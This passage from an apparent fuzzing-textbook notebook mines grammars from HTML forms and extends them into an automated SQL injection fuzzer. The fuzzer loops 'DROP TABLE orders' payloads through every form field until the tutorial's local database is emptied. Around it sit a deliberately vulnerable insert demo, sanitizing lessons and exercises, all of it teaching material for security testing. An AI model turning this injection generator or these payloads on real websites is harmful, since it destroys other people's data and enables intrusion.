        "<email>": ["<_email>"],
        "<_email>": ["<string>" + cgi_encode("@") + "<string>"],
        
        # Stick to printable characters to avoid logging problems
        "<percent>": ["%<hexdigit-1><hexdigit>"],
        "<hexdigit-1>": srange("34567")
    })

In [None]:
class HTMLGrammarMiner(HTMLGrammarMiner):
    def mine_grammar(self):
        grammar = extend_grammar(self.QUERY_GRAMMAR)
        grammar["<action>"] = [self.action]

        query = ""
        for field in self.fields:
            field_symbol = new_symbol(grammar, "<" + field + ">")
            field_type = self.fields[field]

            if query != "":
                query += "&"
            query += field_symbol
            
            if isinstance(field_type, str):
                grammar[field_symbol] = [field + "=<" + field_type + ">"]
            else:
                # List of values
                value_symbol = new_symbol(grammar, "<" + field + "-value>")
                grammar[field_symbol] = [field + "=" + value_symbol]
                grammar[value_symbol] = field_type

        grammar["<query>"] = [query]

        # Remove unused parts
        for nonterminal in unreachable_nonterminals(grammar):
            del grammar[nonterminal]
        assert is_valid_grammar(grammar)
            
        return grammar
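
The core of this translation can be shown on a small example.  The function below is a simplified sketch, not the miner itself: it assumes that field names do not clash with type symbols such as `<email>` (which is what `new_symbol()` takes care of above), and it leaves rules such as `<number>` to be supplied by a base grammar.  The name `fields_to_grammar()` is hypothetical.

```python
def fields_to_grammar(action, fields):
    """Simplified sketch: turn mined form fields into grammar rules."""
    grammar = {"<start>": ["<action>?<query>"], "<action>": [action]}
    query_symbols = []
    for field, field_type in fields.items():
        field_symbol = "<" + field + ">"
        query_symbols.append(field_symbol)
        if isinstance(field_type, str):
            # Typed input: refer to a rule such as <number> or <text>
            grammar[field_symbol] = [field + "=<" + field_type + ">"]
        else:
            # Fixed list of values, as in a <select> menu
            value_symbol = "<" + field + "-value>"
            grammar[field_symbol] = [field + "=" + value_symbol]
            grammar[value_symbol] = list(field_type)
    grammar["<query>"] = ["&".join(query_symbols)]
    return grammar

sketch = fields_to_grammar("/order", {"item": ["tshirt", "drill"], "zip": "number"})
for symbol, expansions in sketch.items():
    print(symbol, "::=", expansions)
```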

In [None]:
html_miner = HTMLGrammarMiner(html_doc)
grammar = html_miner.mine_grammar()
grammar

In [None]:
grammar["<start>"]

In [None]:
grammar["<action>"]

In [None]:
grammar["<query>"]

In [None]:
grammar["<zip>"]

In [None]:
grammar["<tandc>"]

In [None]:
order_fuzzer = GrammarFuzzer(grammar)
[order_fuzzer.fuzz() for i in range(3)]

In [None]:
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))

We see (one more time) that we can mine a grammar automatically from given data.

\todo{Have a `WebFuzzer` class that does it all.}

Limitations:

* Limited to one form per page; no escaping, CGI encoding, etc.
* Limited to GET actions (no POST, PUT, etc.)  Consider http://docs.python-requests.org/en/latest/api/
* No JavaScript handling for dynamic Web pages
* Could use specific values (or ranges) for specific fields (e.g. ZIP as five digits)

### Fully Automatic Attacks on Web Sites

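We can combine the mined grammar with the attacks shown above.  The following subclass extends the query grammar such that every field type can alternatively expand into a SQL injection attack carrying a given payload: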

In [None]:
class SQLInjectionGrammarMiner(HTMLGrammarMiner):
    def __init__(self, html_doc, sql_payload):
        super().__init__(html_doc)
        self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {
            # Every field type may also expand into an attack
            "<text>": ["<string>", "<sql-injection-attack>"],
            "<number>": ["<digits>", "<sql-injection-attack>"],
            "<checkbox>": ["<_checkbox>", "<sql-injection-attack>"],
            "<email>": ["<_email>", "<sql-injection-attack>"],

            # Close the string, add further values, end the statement,
            # append the payload, and comment out the remainder
            "<sql-injection-attack>": [
                "<string>" + cgi_encode("' ") + "<sql-values>" + cgi_encode("); ")
                + "<sql-payload>" + cgi_encode("; --")
            ],
            "<sql-values>": [
                "",
                "<sql-values>" + cgi_encode(", '") + "<string>" + cgi_encode("'")
            ],
            "<sql-payload>": [cgi_encode(sql_payload)],
        })
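To see why such an expansion can succeed, consider a server that builds its SQL command by plain string formatting and runs it as a script.  The following sketch is self-contained and rests on assumptions: the five-column `orders` schema, the helper names `naive_sql_command()` and `table_exists()`, and the in-memory database are illustrative and not necessarily those of the server in this chapter.

```python
import sqlite3

# Assumed schema; the five columns mirror the order form fields
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE orders (item TEXT, name TEXT, email TEXT, city TEXT, zip TEXT)")

def naive_sql_command(values):
    """Build an INSERT command by string formatting (deliberately unsafe)."""
    return ("INSERT INTO orders VALUES "
            "('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))

def table_exists(db, name):
    """Return True if a table called `name` exists in the database."""
    query = "SELECT name FROM sqlite_master WHERE type = 'table' AND name = ?"
    return db.execute(query, (name,)).fetchone() is not None

# The `name` field follows the shape of <sql-injection-attack>:
# close the string, add three more values, end the statement, then the payload
values = {
    "item": "tshirt",
    "name": "Jane' , 'a', 'b', 'c'); DROP TABLE orders; --",
    "email": "doe@example.com",
    "city": "Seattle",
    "zip": "98104",
}

sql_command = naive_sql_command(values)
db.executescript(sql_command)      # runs the INSERT *and* the DROP TABLE

orders_table_survived = table_exists(db, "orders")
```

Since the attacker does not know how many values follow the attacked field, `<sql-values>` is recursive: the fuzzer tries different numbers of extra values until one matches the table.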

In [None]:
html_miner = SQLInjectionGrammarMiner(html_doc, sql_payload="DROP TABLE orders")

In [None]:
grammar = html_miner.mine_grammar()
grammar["<text>"]

We see that several fields are now tested for vulnerabilities:

In [None]:
sql_fuzzer = GrammarFuzzer(grammar)
sql_fuzzer.fuzz()

In [None]:
print(db_connection.execute("SELECT * FROM orders").fetchall())

In [None]:
contents = webbrowser(urljoin(httpd_url,
                "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))

In [None]:
def orders_db_is_empty():
    try:
        entries = db_connection.execute("SELECT * FROM orders").fetchall()
    except sqlite3.OperationalError:
        return True
    return len(entries) == 0

In [None]:
orders_db_is_empty()

In [None]:
def sql_injections(form_url, sql_payload):
    contents = webbrowser(form_url, mute=True)
    miner = SQLInjectionGrammarMiner(contents, sql_payload=sql_payload)
    grammar = miner.mine_grammar()
    fuzzer = GrammarFuzzer(grammar)
    
    while True:
        url = urljoin(form_url, fuzzer.fuzz())
        yield url

\todo{Have a `SQLWebFuzzer` class that does it all.}

`sql_injections()` is a function which, despite its limitations, you could apply to literally any form on the Web.  Of course, we apply it only to our own server:

In [None]:
trials = 0
for url in sql_injections(httpd_url, sql_payload="DROP TABLE orders"):
    print(trials, url)
    with ExpectError(mute=True):
        webbrowser(url, mute=True)
    if orders_db_is_empty():
        break
    trials += 1

In [None]:
orders_db_is_empty()

The bad news is that with a tool set such as the above, anyone can attack Web sites.  The even worse news is that such penetration tests take place every day, on every Web site.  The better news, though, is that the large majority of Web servers are well-protected against such attacks.

## Testing other Graphical User Interfaces

The general scheme is the same as for Web interfaces:

1. Identify UI elements
2. Identify value types to be filled in
3. Create a grammar that holds all UI elements and values
4. Let the grammar create things!
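The four steps above can be sketched for a generic dialog as follows.  Everything here is hypothetical: the `ui_elements` description, the `click`/`fill`/`select` action syntax, and the small `expand()` helper merely stand in for a real UI inspection layer and a full grammar fuzzer.

```python
import random
import re

RE_NONTERMINAL = re.compile(r"(<[^<> ]*>)")

# Steps 1 and 2: UI elements and their value types (hypothetical dialog)
ui_elements = {
    "name": "text",
    "age": "number",
    "newsletter": ["on", "off"],   # fixed list of choices
    "submit": "button",
}

def gui_grammar(elements):
    """Step 3: create a grammar holding all UI elements and values."""
    grammar = {
        "<start>": ["<actions>"],
        "<actions>": ["<action>", "<action>\n<actions>"],
        "<action>": [],
        "<text>": ["<letter>", "<letter><text>"],
        "<letter>": list("abcxyz"),
        "<number>": ["<digit>", "<digit><number>"],
        "<digit>": list("0123456789"),
    }
    for name, kind in elements.items():
        if kind == "button":
            grammar["<action>"].append(f"click({name!r})")
        elif isinstance(kind, str):
            grammar["<action>"].append(f"fill({name!r}, '<{kind}>')")
        else:
            symbol = f"<{name}-value>"
            grammar[symbol] = list(kind)
            grammar["<action>"].append(f"select({name!r}, '{symbol}')")
    return grammar

def expand(grammar, symbol="<start>", depth=0, max_depth=10):
    """Step 4: randomly expand `symbol` into a string of UI actions."""
    choices = grammar[symbol]
    # Beyond max_depth, take the first (non-recursive) alternative to terminate
    expansion = choices[0] if depth >= max_depth else random.choice(choices)
    parts = RE_NONTERMINAL.split(expansion)
    return "".join(expand(grammar, part, depth + 1, max_depth)
                   if part in grammar else part
                   for part in parts)

script = expand(gui_grammar(ui_elements))
```

Each line of `script` is one UI action; a test driver would then replay these actions against the interface under test.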

## Lessons Learned

* User Interfaces (in the Web and elsewhere) should be tested with _expected_ and _unexpected_ values.
* One can _mine grammars from user interfaces_, allowing for widespread testing of user interfaces.
* Consistent _sanitizing_ of inputs prevents common attacks such as code and SQL injection.
* Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others.
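As one illustration of sanitizing, the following sketch stores an order using SQL placeholders and escapes user input before embedding it in HTML.  The `orders` schema and the function name `store_order_safely()` are assumptions made for this example; `sqlite3` placeholders and `html.escape()` are part of the Python standard library.

```python
import html
import sqlite3

# Assumed schema; the five columns mirror the order form fields
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE orders (item TEXT, name TEXT, email TEXT, city TEXT, zip TEXT)")

def store_order_safely(db, item, name, email, city, zip_code):
    """Insert an order; the `?` placeholders pass all values as data, not SQL."""
    db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
               (item, name, email, city, zip_code))
    db.commit()

# An SQL injection attempt ends up as an ordinary string in the table
malicious_name = "Jane'); DROP TABLE orders; --"
store_order_safely(db, "tshirt", malicious_name, "doe@example.com", "Seattle", "98104")
rows = db.execute("SELECT name FROM orders").fetchall()

# An HTML injection attempt is rendered harmless before being shown in a page
escaped = html.escape("<script>alert(1)</script>")
```

With placeholders, the database driver never parses user input as part of the SQL command, so the table survives and simply contains the odd-looking name.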

We're done, so we can clean up:

In [None]:
import time

In [None]:
httpd_process.terminate()

In [None]:
if os.path.exists(ORDERS_DB):
    os.remove(ORDERS_DB)

## Next Steps


* [use _mutations_ on existing inputs to get more valid inputs](MutationFuzzer.ipynb)
* [use _grammars_ (i.e., a specification of the input format) to get even more valid inputs](Grammars.ipynb)
* [reduce _failing inputs_ for efficient debugging](Reducer.ipynb)


## Background


The idea of ensuring that each expansion in the grammar is used at least once goes back to Burkhardt \cite{Burkhardt1967}, to be later rediscovered by Paul Purdom \cite{Purdom1972}.

## Exercises

1. Fix the server such that

   * it does not crash with invalid or missing fields
   * it sanitizes all inputs against HTML or SQL injection attacks
   * it does not reveal internal information with internal errors

2. Protect the server.  Create a grammar that rejects invalid URLs.

3. Use coverage-driven fuzzers such that all options are covered.
